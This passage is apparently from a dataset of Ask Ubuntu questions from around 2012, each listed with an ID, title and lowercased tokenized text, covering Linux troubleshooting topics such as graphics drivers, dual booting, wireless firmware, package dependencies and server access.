/usr/lib/fglrx/alt_ld.so.conf debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx ) : target_alt /usr/lib/fglrx/ld.so.conf current_alt /usr/lib/fglrx/ld.so.conf other target alt /usr/lib/fglrx/alt_ld.so.conf other current alt /usr/lib/fglrx/alt_ld.so.conf debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking debug : fglrx.enabled ( fglrx ) : target_alt /usr/lib/fglrx/ld.so.conf current_alt /usr/lib/fglrx/ld.so.conf other target alt /usr/lib/fglrx/alt_ld.so.conf other current alt /usr/lib/fglrx/alt_ld.so.conf debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx ) : target_alt /usr/lib/fglrx/ld.so.conf current_alt /usr/lib/fglrx/ld.so.conf other target alt /usr/lib/fglrx/alt_ld.so.conf other current alt /usr/lib/fglrx/alt_ld.so.conf debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf debug : fglrx_updates is not the alternative in use debug : fglrx.enabled ( fglrx ) : target_alt /usr/lib/fglrx/ld.so.conf current_alt /usr/lib/fglrx/ld.so.conf other target alt /usr/lib/fglrx/alt_ld.so.conf other current alt /usr/lib/fglrx/alt_ld.so.conf debug : xorgdriverhandler ( % s , % s ) .enabled ( ) : no x.org driver set , not checking what 's going on ? is ldconfig corrupted , or has the driver package just not been properly installed , despite reporting to the `` additional drivers '' panel that it is ?
183109	bejeweled twist clone for gnu/linux	what is the best bejeweled twist clone for gnu/linux . i know about like kdiamond and geweled , but those games are do n't have sound or good graphics . i know one good bejeweled clone for gnu/linux hotei jewels relax but that was n't a bejeweled twist clone . f.i.y i only run thing natively in gnu/linux and i do n't use compatibility layers or emulations over they are buggy and they do n't use the gnu/linux file hierarchy . thank you .
183112	virtualbox image to full install	i am new to ubuntu , am using it via virtualbox on windows 7 , and would like to potentially save an image of my virtualbox setup and use it as my full install of the os on the same machine . is this doable ?
183127	will the latest ubuntu fit on a 700 mb cd ?	will it fit on a regular 700 mb cd ? also , i have a macbook that currently has an erased hd ( so no os installed currently ) if i boot from a cd can i choose to allocate my whole hd to ubuntu ? also the old os my macbook was running on was 64 bit , should i also use ubuntu 64 bit as well ? thanks : )
183129	ctrl+f4 does n't work in kde for firefox	i observed that the shortcut for closing a tab in firefox ( ctrl+f4 ) does n't work on kde . it seems it is being intercepted by kwin . is there any fix or workaround for this problem ?
183131	dev/sdg is not what i expected	i have been running a dual boot with xp on the first drive and ubuntu on the second drive . i 'm trying to reinstall ubuntu to my second hd with a live cd but when i use the partioning tool it shows the second drive as /dev/sdg . that is not what i expected . i had asked a question before and from what they had said i was expecting ? dev/sdc , , , does it make any difference ?
183132	automated installation using preseeding from url failed ( from within virtualbox )	i 'm trying to do automated installation using preseeding from url , but it failed . basically , i 'm following ubuntu server quick install , no questions asked ! http : //blog.dustinkirkland.com/2011/03/ubuntu-server-quick-install-no.html using the ubuntu 12.04 desktop iso , and append the following options to the kernel command line ( esc , then f6 at the boot screen ) : priority=critical locale=en_us url=http : //goo.gl/pbkbx the installation should proceed from start to finish , but mine failed at the first step resolving goo.gl . what 's wrong ? i also tried to add auto , as per https : //help.ubuntu.com/12.04/installation-guide/i386/preseed-using.html ie. , appending priority=critical locale=en_us auto url=http : //goo.gl/pbkbx but still , ca n't resolve goo.gl how can i fix it ? ps . this is run from within virtualbox .
183134	ubuntu 12.04 desktop iso cd boot under virtualbox , no network	i boot the ubuntu 12.04 desktop iso cd with virtualbox , but get no dns . i.e. , eth0 has its ip address , but dns resolving always fails . i tried virtualbox bridged networking , then nat , but for both case dns resolving failed . this is a pure ubuntu 12.04 issue because if i switch my virtualbox boot cd to something else ( grml64_2011.12.iso ) , network & dns resolving is just fine . i.e. , ubuntu 12.04 ca n't find my local dns server and use 127.0.0.1 in /etc/resolv.conf , while other distros can find and use my local dns server just fine . any ideas ? thanks
183137	installation problems & antivirus	we have just migrated our systems from windows to ubuntu . we have more than 50 systems previously running windows xp & windows 7 . after the release of 12.04 we decided to switch to ubuntu . while we were installing ubuntu 12.04 on pentium 4 systems we have faced some issues . we tried it with a usb flash driver & cd . the typical configuration of the system is as follows : pentium 4 with ht & 512 mb ram , 40/80 gb ide / sata hdd . in windows there were several partitions and data on all the drives in all the systems . we have addressed this by taking backup of the c : drive on other drives & while installing ubuntu we have just deleted & the c drive & recreated linux partitions as follows - /root , /boot , /home & swap . ( in 10 gb ) the problem is that the linux gets installed without any error . however when i restart the system after the installation the system hangs in while detecting the hdd in bios and the system fails to start until i remove the hdd . when i installed the previous ubuntu version it worked fine , without any hassle . also if we install ubuntu 12.04 on same hdd on any other higher capacity system & reconnected to old system it works fine . how can i fix this problem ? also , is there is any antivirus which will give me real time protection on ubuntu 11 & higher versions with both 32 & 64 bits ?
183155	packaging and uploading to launchpad is possible from ubuntu based linux ?	is it possible to build packages and uploading them to the launchpad through the ubuntu based linux operating systems ? my intention or requirement behind this question is to have a very light ubuntu based system and have to upload packages from that system , is it possible ?
183157	how do i patch a kernel bug ?	sometimes i ca n't boot my laptop - it gets stuck here : then i have to do a hard-reset and it 's fine . i checked the boot logs and this is what i think it 's causing it ( nevermind the timestamp inconsistencies ) : [ 38.377595 ] bug : unable to handle kernel null pointer dereference at ( null ) [ 38.377821 ] ip : [ < ffffffffa01f6d7b > ] r600_pcie_gart_tlb_flush+0xeb/0x110 [ radeon ] [ 38.378065 ] pgd 121491067 pud 121492067 pmd 0 [ 38.378214 ] oops : 0000 [ # 1 ] smp here is the full log . i found the patches but i have no idea about which to use and how .
183161	after installing mysqli phpmyadmin stop loading	on linux host 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:52:48 utc 2012 x86_64 x86_64 x86_64 gnu/linux phpmyadmin wo n't load after installing mysqlnd . i 'm using php5 , mysql and mysqlnd . maybe mysql and mysqlnd conflicts for phpmyadmin . problem : if i remove mysqlnd ( mysqli support ) , php5 not working with mysqli , php5 only works with mysql . ( results for tests : function_exists ( 'mysqli_fetch_all ' ) return false . that 's ok . if i installed mysqlnd , php5-mysqlnd , php works with mysql + mysqli sumulately . problems affected after mysqlnd install : after installing mysqli ( mysqlnd ) support , phpmyadmin wo n't load . works php5 mysql + mysqlnd . when installing once again phpmyadmin than mysqlnd wo n't load . php pdo and mysql only works .
183164	will there be an backport of unity 6/compiz for precise ?	in my opinion unity 5.x in precise is not how it should be in an lts and i would like to know , whether unity 6.x/compiz ( as in quantal ) will be backported to precise for a better performance .
183166	rhythmbox album art search plugin sidebar not appearing	i am using version 2.96 of rhythmbox in ubuntu 12.04 . i want to be able to add album artwork to my music so it works better on my ipod . however , for some reason the album art search plugin for rhythmbox does n't display . i have checked the plugins menu , and it is installed and checked as well as the cover art plugin . however , it still seems it is invisible ! please help !
183171	how can i sync my new ipad on ubuntu ?	i use ubuntu 12.04 and i would like to add some songs and videos . i installed libimobiledevice , i can transfer songs to my ipad from banshee and rhythmbox , and play those from my computer , but i can not see them from my ipad . any solution other than wine/virtual box/ ... ?
183176	what is the use of /etc/hosts ?	i 'm very new to ubuntu and i want to know : what is the exact use of /etc/hosts ? lets say i 'm adding this into it : 127.0.x.x mydomain what does that mean ?
183177	laptop to external monitor via vga cable not working	my laptop is the toshiba satellite c850-f31q ( with these specs : http : //www.laptopdirect.co.za/laptop_specifications.php ? laptop=59683 ) ( amd radeon graphics card ) . it is running linux-ubuntu-gnome 3 ( and windows 7 ; dual boot ) urgently need to know how to connect it via vga to - external lg monitor ( works great in windows ) . please could you help .
183178	why ca n't dash search find a program by its full name ?	for some applications , dash search comes up empty when searching by the application 's full name . when typing the first couple of letters , it works . i wonder why ... musescore is a fine example . when i search for `` muse '' in the dash search , musescore is found . when i search for `` musescore '' , nothing is found . this behavior makes me distrustful of the dash search ... i wonder how often it misses installed programs ... i like to be able to trust the software tools i 'm using .
183180	logitech wireless mouse m235	i bought a logitech m235 mouse . this works perfectly under windows.basically , it works on ubuntu and is identified as m305 . this problem only occurs when the laptop is running on battery power : when i do n't use the mouse longer than 5 seconds , it does not works for a few seconds . how can i stop this ?
183181	netbeans styles . are there style profiles similar to notepad++ ?	not long ago i started to use ubuntu . when i was on windows i used notepad++ . i was very surprised when i found that notepad++ is only for windows . so i installed netbeans . netbeans is a powerful ide and in general i like it , except default styles . maybe are there style profiles ( i.e . plugins or other forms ) ? it would be good if there is a style profile completely identical to notepad++ . i will be very thankful if you would help me to find what i 'm looking for .
183192	broadcom bcm4331 : `` device not ready firmware missing '' error	just installed ubuntu 12.04 and i ca n't connect to my wireless network . my network does n't even appear . i have a message it says : device not ready firmware missing . this is what i get when i run , lspci -nn | grep 0280 in terminal : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) please help me to get this working .
183198	find what program/process is writing to disk and what file it is writing to	i left my desktop untouched for period of time . the hdd led still flashes every second and makes a tick sound . is there any way to find out which process is doing it and which file it writes to ?
183204	what are the minimum system requirements for ubuntu 12.04 desktop ?	sir , i am a linux beginner . i want to use ubuntu 12.04 desktop version on my system . so i want to know the minimum system and internet requirements . i have windows xp sp2 , 1gb of ram , 160gb hd and a 256kbps bandwidth dial up connection . are these enough to use ubuntu 12.04 desktop ? ? please let me know .
183208	ubuntu vs . win 7	i had windows 7 installed previously on my pc , but i mistakenly had compressed my boot files so i had to install a new os . since i did n't have the windows install , i went a head and installed ubuntu 12.04 , hoping to install windows later . anyway , when i 've got a win 7 cd i tried to boot from it but it did n't work ( the computer booted in ubuntu ) . later i tried removing ubuntu from my pc by using the ubuntu cd , but even after i removed it , the win 7 cd did n't work . i wondered whether there was something wrong with the win 7 cd . however it proved wrong as the cd worked when i opened it in ubuntu using wine loader . i tried to install it through that window ( which may seem to you as stupid , but heaven knows i had no choice ) . unfortunately , it did n't work either . then i tried partitioning the hard drive through my ubuntu cd , but it did n't work and i do n't understand it well as i 'm new to linux . do i have to partition my hard disk ? if so , how ? or else , is there any other way to do this ? i 'd be very grateful if you could help me . i like ubuntu in many ways , but still i have a number of problems when coping with my day-to-day work in ubuntu . waiting for your answers with fingers crossed !
183211	how to access ubuntu server from local pc ?	today i installed my first web server , which is ubuntu 12.04 lts . i got apache , php and mysql working , there is even myphpadmin ! everything is working fine on that pc , but the problem is that i have no idea how to connect to this server from my pc . just to clarify- i got one pc that i work on and got another one , which has ubuntu server running . i even managed to connect them through the router , which i made to work as a switch . i can see the ubuntu server on my windows pc in `` network '' , but it 's empty , i ca n't see any files . i tried to share a folder etc/www on server , but it shows an error saying something about right , that i 'm not this folder 's owner . i guess i 'm not doing the right thing at all , am i ? even if i could see shared folder on my windows pc- i would still be not able to type `` somedomain.com '' on windows pc and access for example index.php or mysql database . so , the question is- how do i configure ubuntu server to be accessible from windows pc ?
183214	the internet speed dropped down when i upgraded to 11.10	i upgraded my vaio vgn-cr35g to 11.10 and it was all fine until i opened an internet browser to come to a complete halt when trying to load google . strangely it 's only me and everyone else in the house does n't have such an issue . ( we have windows , linux and mac running so it 's just me ) . what can i do ?
183215	how to install ubuntu 12.04 on macbook pro ?	how to install ubuntu 12.04 on a macbook pro ? i just bought one and i want to install ubuntu alongside mac os x. i have tried the same way as with windows , but it seems the mac can not recognize the ubuntu cd .
183223	exception in thread `` main '' java.lang.noclassdeffounderror : finger	iâ´am trying to use this finger.java for my android project , but i get this error . $ java finger username @ host.com exception in thread `` main '' java.lang.noclassdeffounderror : finger caused by : java.lang.classnotfoundexception : finger at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : finger . program will exit . i have looked on google and then i try this : java -classpath .finger and ... set classpath= % classpath % : .finger.java : but this does not work : ( i get the java file from this page : http : //elm.eeng.dcu.ie/~ee402/ee402notes/html/ch10s03.html # fingerscreengrab i only need to call it from my 'mainactivity ' for my project . my java setup is like this : $ java -version java version `` 1.6.0_24 '' openjdk runtime environment ( icedtea6 1.11.3 ) ( 6b24-1.11.3-1ubuntu0.12.04.1 ) openjdk server vm ( build 20.0-b12 , mixed mode ) and $ javac -version javac 1.7.0_07
183231	ubuntu swappiness	i have a laptop with 4 gb ram and i3 processor . it runs very fast when i use windows , but it keeps slowing down on my ubuntu when i use it continuously . i noticed that 500mb+ swap is getting used even if only 20 % of ram is only used , and i have a doubt that this is the reason for the slowness . i have already set the swappiness value to 10 . then how else can i change it ? i spend most of my time in ubuntu so this is very important for me .
183232	why are some 7digital songs not available in the ubuntu one music store ?	not all of the music from 7digital is available in the ubuntu one music store . as an example : the band `` i am empire '' is not listed but if i search the same in the 7digital store , i can find it . so what 's the reason for that ?
183233	what are these files in my /dev directory ?	i know that most devices are presented in the /dev directory , but only now have i actually noticed two very strange , yet familiar names in there ... i 'm talking about stdin @ and stdout @ down there : what are these for ? are they used by functions of the c language ?
183235	how to change utorrent 's port from 8080 to another one ?	i 'm new to ubuntu and still learning how to use it . recently , i 've been trying to install utorrent , which i already was able to do so , but i need the port 8080 free to use run tomcat/glassfish and on port 80 php . briefly , how can i change utorrent 's port from 8080 to another one ? i 've been trying to find a solution for this issue for about 3 days now . i saw some solutions , such as create a utserver.config , but i have no clue in how to use it or configure it by terminal or on properties , that is something hardly explained by anyone . any help will be appreciated .
183236	dual booting disabled ubuntu boot	i have a dual-boot ubuntu 12.04/windows 7 setup . i was trying to set it up so the default was to boot to my windows boot screen where i choose an os . i changed two settings in ubuntu , so the timer on ubuntu boot was 0 and it automatically chose to boot to windows . now i ca n't get into ubuntu at all . even choosing it from windows reverts to this loop . is there any way i can modify ubuntu behavior or override this loop ?
183239	trouble installing 12.04 from cd , blank screen with cursor	i should preface this with saying that this is not my first rodeo . i started playing with linux in 1999 ( red hat ) and i 'm currently typing this on a thinkpad running 12.04 ... when i put in the live cd , i boots , and i can get to the option menu to decide whether to install/run etc , but at any point beyond that i get only a single caret . i can type stuff in , but it goes no where . i 've tried the usual stuff like running with nomodeset ( thinking it was the intel hd400 graphics , but it is integrated graphics ... ) here is the setup : asus p8z77 pro ( with the atheros ar9485 wifi supposedly , but i 'm not that far yet ) i7 3370k 8gig x 2 g.skill crucial m4 ( 256 gig ) lg super-multi dvd re-writer no video card update : i though may be it was a bad image on the cd , so i downloaded another iso , and used a usb disk . now it boots to a blank screen . i can see the `` press any key to get options '' screen , but after that , it just goes to a blank screen .
183240	how do i replace a binary with a shell script in a unity launcher ?	i used how to pin eclipse to the unity launcher ? this to pin eclipse to unity launcher . but now i need to replace eclipse binary with script in order to use custom gtk config . here is a sh file ( named ec ) : # ! /bin/sh gtk2_rc_files=gtkrc-sar ./eclipse and here 's desktop file : [ desktop entry ] type=application name=eclipse comment=eclipse integrated development environment icon=/home/mighter/development/eclipse/icon.xpm exec=/home/mighter/development/eclipse/eclipse terminal=false categories=development ; ide ; java ; if i replace eclipse ( binary name ) with ec ( sh name ) , it wo n't run . how do i fix this ?
183245	how can i access ubuntu server using mysql workbench and filezilla ?	how can i access ubuntu server using mysql workbench and filezilla so that i can work on database and files from local windows pc ?
183249	the package fglrx needs to be reinstalled , but i ca n't find an archive for it	wish i was here with good news today but as my luck has it i 'm afraid i 'm not : ( i recently bought a new graphics card ( sapphire hd 7870 ) and installed it into my system ... went well up to there ... i tried updating the driver but wo n't able to in additional drivers . i then tried this page http : //wiki.cchtml.com/index.php/ubuntu_precise_installation_guide now when i try anything this message comes up '' the package fglrx needs to be reinstalled , but i ca n't find an archive for it '' i am at the minute downloading ( found on link above ) download the latest catalyst package . this package contains both the 32-bit and 64-bit driver . ( i 'm on first step ) ... slow internet ... yay +_+ wget http : //www2.ati.com/drivers/linux/amd-driver-installer-12-8-x86.x86_64.zip unzip amd-driver-installer-12-8-x86.x86_64.zip chmod +x amd-driver-installer-8.982-x86.x86_64.run any pages or info anybody may have shall be greatly appreciated can provide more information if needs be release 12.04 ( precise ) 64-bit kernel linux 3.2.0-29-generic gnome 3.4.2 oh and i ca n't open `` additional drivers '' now
183250	ntfs for windows	i want to install windows to my computer . however , windows needs ntfs -filesystem for hard disk . i want to replace ubuntu with windows . how do i do that , because ubuntu does n't use ntfs , and windows installation requires it .
183256	crashplan not starting . fails to find swt-gtk	i 've installed crashplan on my ( k ) ubuntu computer . however , it fails to start and the ui_output.log says : [ 09.02.12 15:24:43.518 info main root ] ************************************************************* [ 09.02.12 15:24:43.519 info main root ] ************************************************************* [ 09.02.12 15:24:43.524 info main root ] loading lib/swt-64.jar , exists=true [ 09.02.12 15:24:43.525 info main root ] [ file : /usr/local/crashplan/lib/com.backup42.desktop.jar , file : /usr/local/crashplan/lang/ , file : /usr/local/crashplan/skin/ , file : /usr/local/crashplan/lib/swt-64.jar ] [ 09.02.12 15:24:43.527 info main root ] started crashplandesktop [ 09.02.12 15:24:43.528 info main root ] cpversion = 3.2.1 - 1332824401321 ( 2012-03-27t05:00:01:321+0000 ) [ 09.02.12 15:24:43.529 info main root ] args = [ ] [ 09.02.12 15:24:43.531 info main root ] locale = english ( united states ) [ 09.02.12 15:24:43.570 error main com.backup42.desktop.cpdesktop ] failed to launch cpdesktop ; java.lang.unsatisfiedlinkerror : no swt-gtk-3557 or swt-gtk in swt.library.path , java.library.path or the jar file , java.lang.unsatisfiedlinkerror : no swt-gtk-3557 or swt-gtk in swt.library.path , java.library.path or the jar file java.lang.unsatisfiedlinkerror : no swt-gtk-3557 or swt-gtk in swt.library.path , java.library.path or the jar file at org.eclipse.swt.internal.library.loadlibrary ( unknown source ) at org.eclipse.swt.internal.library.loadlibrary ( unknown source ) at org.eclipse.swt.internal.c. < clinit > ( unknown source ) at org.eclipse.swt.internal.converter.wcstombcs ( unknown source ) at org.eclipse.swt.internal.converter.wcstombcs ( unknown source ) at org.eclipse.swt.widgets.display. < clinit > ( unknown source ) at com.backup42.desktop.cpdesktop. < init > ( cpdesktop.java:231 ) at com.backup42.desktop.cpdesktop.main ( cpdesktop.java:161 ) [ 09.02.12 15:24:43.570 error main root ] failed to launch cpdesktop ; java.lang.unsatisfiedlinkerror : no swt-gtk-3557 or swt-gtk in swt.library.path , java.library.path or the jar file i 've installed the relevant ( i think ) swt-gtk packages .
183257	tata docomo 3g unable to connect using huawei e303c	i am trying to connect to internet using tata docomo 3g using huawei e303c usb modem . with the same modem i am able to connect to idea cellular and reliance networks . i have tried using `` tata.docomo.internet '' and `` tatadocomo3g '' pan 's . while trying to connect i am getting message `` modem network disconnected '' . i am using ubuntu 12.04lts .
183258	lubuntu : ca n't enable wireless	after disabling the wireless adapter via a key i can not enable it again . i tried rfkill unblock all but it doens't helped . rfkill list 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no how can i enable wireless again ?
183260	how do i change the firefox bookmark icon ?	how can i change firefox bookmarks icon ? it keeps the standard whatever icon theme i choose edit : i want make firefox use the theme 's icons ( e.g . faience ) .
183263	how to script a reinstall ( apt repo 's and installed packages )	i need to wipe my hard drive and reinstall ubuntu . /home is on a separate partition , so i can back that up to a backup drive , then copy it back to the wiped drive , install ubuntu , and point it at the existing /home , no problem . however , i also want to script a reinstall of all my apt repo 's and the packages i currently have installed , so i do n't have to waste hours doing that manually . anyone know a good way to do this ? ps - at least , i 'm pretty sure i have to wipe the drive . need to install windows 7 , and only have an hp system restore disk that formats the whole drive , and not a legit windows 7 install disk that lets me install on a single partition . if somebody know a way to trick the system restore disk to install only to a single partition , i 'd love to hear it .
183265	setting up beats audio on hp pavilion m6	i have an hp pavilion m6-1054sa laptop , with a beats subwoofer on the bottom . the normal laptop speakers work fine under ubuntu but the beats speaker ( s ? ) does not . anyone know how to get this working ? here 's my lspci output , if it helps . 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] ( rev ff ) 07:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 07:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 0a ) 08:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 )
183267	why ca n't terminal open my .sh file ?	i 'm trying to run a minecraft server with bukkit in 12.04 . in the .sh file i 'm using to start the server , i wrote java -xms1024m -xmx1024m -jar ( and then i wrote the location of where the craftbukkit file is ) . when i try to run it in terminal , it opens then closes immediately and i ca n't start the server . how can i keep terminal open and get the file to run ?
183269	regular installation or live usb with reserved space ?	i recently just got a another 8 gb flashdrive ( i have a total of 3 flashdrives , 18 gb of total usable space ) and i want to install ubuntu and boot it on a computer to do some coding and robotics ( class at high school ) . but the live cd only allows 4 gb maximum of reserved space , but i want to fill it all . should i just install ubuntu regularly onto that flashdrive , or am i asking a bit much ?
183270	lamp uninstall and xampp	i installed lamp with this tutorial a while back : http : //www.unixmen.com/install-lamp-with-1-command-in-ubuntu-1010-maverick-meerkat/ i have since decided it would be better to use the more full-featured xampp . i installed xampp successfully , but localhost still displays the default apache page . apparently , i need to uninstall the lamp components individually to use xampp . any advice on how best to do this ?
183274	intel gma 950 does n't work on asus eee pc 1000he	my system info showing my graphics card as unknown in ubuntu 12.04 and unity works slowly ( ( i tried to reinstall driver ( as advised here ) , but it 's did n't help . upd : 3 years ago , i install ubuntu and os works enough quickly.. after that , i using winxp , and now , when i install ubuntu 12.04 , i have lags on them ( any window opens during 30-50 seconds.. ) i think , that it is slow working of unity and my video card
183276	what if i remove the additional graphic driver ?	i have an dell laptop with ati rv710 [ mobility radeon hd 4500/5100 series ] and proprietary fglrx graphic card installed . the card give me some issue that i think i ca n't do anything . and i do n't need it , i just use my laptop to browsing web for youtube video , text edit and no more . so i wonder if i remove the driver so the card no more effect to my sytem , is it right ?
183281	i just moved , have no internet on my laptop or ipod , but everyone else who lives here does	i just moved to thunder bay and my laptop as well as my ipod can not connect to the internet . my laptop allows me to write the password for the wifi , but i still have no internet connection . when i try to use the cable , the computer tells me i have a perfect connection , even the icon shows that it 's working , but i ca n't open any web pages or use any internet functions . when i try to use msn it sends me to a troubleshooting option and informs me that there 's some kind of problem with the `` gateway '' . i have unplugged the modem and the router and plugged them back in , this did not help . i am living in a home where all the people are using wifi on the same system as me , and no one has ever had any problems . back home both my laptop and my ipod worked without a problem both in my home , as well as on campus . since this problem seems to be limited only to me , it would indicate that there 's a problem on my end -- with my laptop . however , in that case my ipod would be working . it has never failed to connect before . any suggestions would be much appreciated .
183283	equivalent of partition magic for ubuntu	which is the equivalent of partition magic for ubuntu ?
183284	why is the font spacing on some websites broken ?	i am using ubuntu 12.04 on a dell studio 15 and so far am really impressed . i could not find a solution for my problem by googling . the fonts on some websites do not have proper spacing . they overlap and are very hard to read that way . i am using the ubuntu standard fonts and have not changed them after installing . here is a screen shot that shows my problem . the problem occurs in firefox and chrome the same way , and on the same websites . thanks for your help .
183303	maximize the window to the global menu of unity , using cairodock with unity ?	hello i install cairodock 3 from ppa : cairo-dock-team and select the beginning of secion of ubuntu `` cairodock with unity '' http : //i.imgur.com/jytwc.png the problem is when i maximize window buttons ( such as for eg close , minimize and maximiza ) are not placed to the unity global menu . as you can see in the following pic
183305	graphics driver being reported as gallium 0.4 on llvmpipe ( llvm 0x300 ) instead of intel	i have an integrated intel 945gm in a toshiba laptop . previously the graphics driver was reported correctly , but at some point it has changed . i 've noticed general poor performance and though it should meet minimum requirements for unity 3d is using unity 2d . under the details panel in system settings it is now reporting gallium 0.4 on llvmpipe ( llvm 0x300 ) . any help would be appreciated . i have searched google for hours trying to find an answer .
183306	the following package have unmet depnedencies ?	can someone please help me with these errors : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libreoffice-base-core : depends : ure but it is not going to be installed libreoffice-calc : depends : ure but it is not going to be installed libreoffice-common : depends : ure but it is not going to be installed libreoffice-core : depends : ure ( > = 3.5.4~ ) but it is not going to be installed libreoffice-draw : depends : ure but it is not going to be installed libreoffice-gnome : depends : ure but it is not going to be installed libreoffice-gtk : depends : ure but it is not going to be installed libreoffice-impress : depends : ure but it is not going to be installed libreoffice-math : depends : ure but it is not going to be installed libreoffice-writer : depends : ure but it is not going to be installed python-uno : depends : ure but it is not going to be installed synaptic : depends : libept1.4.12 but it is not going to be installed depends : libvte9 ( > = 1:0.24.0 ) but it is not going to be installed uno-libs3 : depends : ure but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i do n't know how to fix this , sudo apt-get -f install is also not working and i ca n't update using both terminal and update manager .
183307	tv tuner will ubuntu install in place of windows media centre	hi i have a medion 1000gb with windows built in if i switch to ubuntu will it automatically install tv tuner and if so does it have similar to windows media centre please be gentle am thick with computers cheers doug
183311	how to add `` nav packets '' to a video file ?	i am using ubuntu 10.04 , and i want to add a video file to bombono dvd 0.5.5 - but it complains the file does not contain `` nav packets '' . the file was obtained by dvdrip , from a dvd ( no transcoding - it is the actual vob file in the temp folder ) . my question is : how do i add these nav packets to the video file , so the dvd authoring program bombono can accept it ? bombono 's error message also says : bombono dvd can use `` dvd-ready '' video only now . use muxing programs like `` mplex -f 8 '' ( from mjpegtools ) , mencoder ( from mplayer ) or transcode to make your video ready for bombono dvd . so , i have tried mplex -f 8 -o output.vob input.vob , but it returns : **error : [ mplex ] file input.vob unrecogniseable ! i do n't know how the mencoder command could be used for the purpose ... anyone can help me ? note : upgrading bombono is not an option
183312	how are .so files used in ubuntu	i am very new to linux and ubuntu and i have ported my simple game engine to linux . the engine is in a .so file and is linked to the executable . i am unable to run my executable because it says that it can not find the engine.so file ( when run in terminal ) . so if i am developing on ubuntu how can i get the executable to find the library were ever it is ? second question is when distributing the application how are the .so files installed ? i assume they are not just put in the same directory as the exe as in windows ? so how are they installed ?
183314	global menu and hud suddenly broken	i 've been using ubuntu 12.04 for about three months now and i am very satisfied , it is highly usable and stable . even though i did n't like the global menu at first , i 've grown to appreciate its added screen real estate . but , some update or some piece of software recently broke my global menu / appmenu . every application reverted to displaying the menu bar at all times , even when maximized . besides that , the hud has stopped working , so it seems like the applications are no longer able to provide the menu information to the global menu indicator / whatever it is . i am quite clueless as to what caused this bug / regression . here are the things i have tried : reset unity and the compiz plugin with unity -- reset uninstalled and reinstalled appmenu- { gtk3|gtk|qt } ( sudo apt-get remove blah & & sudo apt-get install blah ) use unity 2d session to check whether it is somehow caused by `` regular '' unity searched with gconf-editor for some menu related settings that may have been corrupted , but nothing significant came up or i was n't sure what the option did do you have any clues ? what could have caused this ?
183319	how to completely remove firefox so it wo n't update ?	i really do n't like firefox , so the first thing i did after installation was install chromium as a browser and removed firefox via terminal using : sudo apt-get remove -- purge firefox but every time update manager opens it lists language packs for firefox . i can uncheck the package , but it gets rather annoying . is there some lingering file somewhere that i need to purge as well ?
